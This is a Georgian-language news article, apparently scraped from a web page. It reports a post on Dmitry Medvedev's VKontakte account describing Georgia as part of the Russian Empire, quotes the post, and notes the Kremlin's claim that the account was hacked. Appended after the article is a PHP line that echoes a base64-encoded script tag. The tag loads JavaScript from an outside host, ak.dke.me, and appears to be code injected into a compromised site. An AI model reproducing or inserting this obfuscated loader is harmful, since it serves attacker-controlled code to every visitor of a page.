celsiusi
ავერსი საქკაბელი
რუსეთის უშიშროების საბჭოს მდივნის მოადგილის, დიმიტრი მედვედევის სოციალურ ქსელში გამოქვეყნდა ჩანაწერი, სადაც ის საქართველოს რუსეთის იმპერიის ნაწილად მოიხსენიებს. ამჟამად ჩანაწერი აღარ იძებნება. რუსული მედიის ცნობით, კრემლში განაცხადეს, რომ მედვედევის სოცქსელი გატეხეს.
 
როგორც „ბიბისის“ რუსულენოვანი სამსახური წერს, რუსეთის უშიშროების საბჭოს მდივნის მოადგილის გვერდზე, სოციალურ ქსელ „ვ კონტაქტეში“ გამოქვეყნდა ჩანაწერი, სადაც საქართველო რუსეთის იმპერიის ნაწილად, ხოლო ყაზახეთი ხელოვნურ სახელმწიფოდ იყო მოხსენიებული. ეს ჩანაწერი დიმიტრი მედვედევის სოციალურ ქსელში 2 აგვისტოს ღამით გამოქვეყნდა. პოსტში ეწერა, რომ უახლოეს მომავალში „სუვერენიტეტების აღლუმები აღარ იქნება“ და რომ საბჭოთა კავშირის შემადგენლობაში შემავალი ყველა ერი „ისევ ერთად იცხოვრებს მეგობრულად და ურთიერთგაგებით“.
 

"არავის უნდა ჰქონდეს ეჭვი, რომ საბედისწერო შეცდომა, რომელიც 90-იანების დასაწყისში იქნა დაშვებული, გამოსწორდება, არანაირი სუვერენიტეტების აღლუმი აღარ იქნება და ყველა ერო, რომელიც ოდესღაც დიდ და მძლავრ საბჭოთა კავშირში ცხოვრობდა, ისევ ერთად იცხოვრებს მეგობრობასა და ურთიერთგაგებაში. ამისთვის ჩვენ არ დაგვენანება არც ძალები და არც სახსრები. ჩვენ უკვე დავიწყეთ ამ მიმართულებით მოძრაობა. კიევისა და მალოროსიის ყველა ტერიტორიის ნაციონალისტების ბანდებისგან განთავისუფლების შემდეგ, რომლებმაც უკრაინელობა თავადვე მოიგონეს, რუსეთი ისევ გახდება ერთიანი, როგორც 1000 წლის წინ. ამის შემდეგ, მოსკოვის ძალისხმევით და სლავური ერის ხელმძღვანელობით ჩვენ წავალთ ახალ ლაშქრობაში, რათა ჩვენი სამშობლოს საზღვრები აღვადგინოთ, რომლებიც, როგორც ცნობილია, არსად არ მთავრდება.

ჩვენ არ ვაპირებთ, ჩვენი მიწები ვინმეს დავუთმოთ. მაგალითად საქართველოს რუსეთთან შეერთებამდე ეს ქვეყანა საერთოდ არ არსებობდა. 1801 წელს ამჟამინდელი საქართველოს ტერიტორია შედგებოდა ხუთი დამოუკიდებელი წარმონაქმნისგან: ქართლი და კახეთი დედაქალაქით ტფილისში, იმერეთი დედაქალაქით ქუთაისში, სამეგრელო და გურია შავი ზღვის სანაპიროზე და სვანეთი მთიან რაიონებში. ანუ საქართველო ამ საზღვრებში შექმნა რუსეთმა. საქართველო რუსეთისკენ ილტვოდა იმიტომ, რომ ესმოდა, რომ რუსეთი მისი ერთადერთი ბუნებრივი მოკავშირე იყო მუსულმანთა საკმაოდ მტრულ გარემოში. ახლაც იგივე მეორდება. ჩრდილოეთ და სამხრეთ ოსეთი, ასევე, აფხაზეთი დანარჩენ საქართველოსთან შეიძლება მხოლოდ რუსეთის შემადგენლობაში გაერთიანდეს", - ეწერა პოსტში.

 
დილით ოფიციალურ კრემლში განაცხადეს, რომ რუსეთის უშიშროების საბჭოს მდივნის მოადგილის სოციალური ქსელი ჰაკერებმა გატეხეს და აღნიშნულ საქმეს სოციალური ქსელის ადმინისტრაცია გამოიკვლევს.
 
 
799
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");